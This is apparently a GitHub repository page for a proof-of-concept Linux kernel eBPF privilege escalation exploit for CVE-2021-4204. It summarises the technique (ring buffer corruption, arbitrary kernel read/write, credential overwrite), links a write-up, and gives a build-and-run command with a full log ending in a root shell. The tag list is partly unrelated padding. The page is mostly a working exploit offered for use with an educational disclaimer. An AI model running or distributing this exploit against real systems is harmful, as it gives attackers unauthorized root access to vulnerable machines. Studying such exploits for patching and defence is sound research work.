tr3ee/CVE-2021-4204
GitHub: tr3ee/CVE-2021-4204
Local privilege escalation exploit for a Linux kernel eBPF vulnerability: it corrupts a BPF ring buffer (ringbuf) to obtain arbitrary kernel address read/write, then overwrites the process credential structure to gain root.
Stars: 62 | Forks: 10
# CVE-2021-4204
Chinese write-up: https://tr3e.ee/posts/cve-2021-4204-linux-kernel-ebpf-lpe.txt
For educational/research purposes only. Use at your own risk.
## Build and run
```
$ sh build_and_run.sh
Build from source...
cc -I include -static -w -o exploit exploit.c
Start exploit! This might take some while...
[*] phase(1/7) 'create bpf map(s)' running
[+] phase(1/7) 'create bpf map(s)' done
[*] phase(2/7) 'corrupt ringbuf' running
Killed
--------------------------------
[*] phase(1/7) 'create bpf map(s)' running
[+] phase(1/7) 'create bpf map(s)' done
[*] phase(2/7) 'corrupt ringbuf' running
[+] phase(2/7) 'corrupt ringbuf' done
[*] phase(3/7) 'spawn processes' running
[+] phase(3/7) 'spawn processes' done
[*] phase(4/7) 'find cred (slow)' running
[+] phase(4/7) 'find cred (slow)' done
[*] phase(5/7) 'overwrite cred' running
[+] phase(5/7) 'overwrite cred' done
[*] phase(6/7) 'spawn root shell' running
[+] Enjoy root!
# id
uid=0(root) gid=0(root) groups=0(root)
# exit
[+] phase(6/7) 'spawn root shell' done
[*] phase(7/7) 'clean up the mess' running
[+] phase(7/7) 'clean up the mess' done
```
Tags: 0day hunting, Cutter, CVE-2021-4204, Docker image, Linux kernel, LPE, PoC, Ringbuf, Root, web report viewer, kernel security, protocol analysis, subdomain enumeration, penetration testing, client-side encryption, brute force, local privilege escalation, privilege escalation, vulnerability reproduction, system security, network security, privacy protection, hacking techniques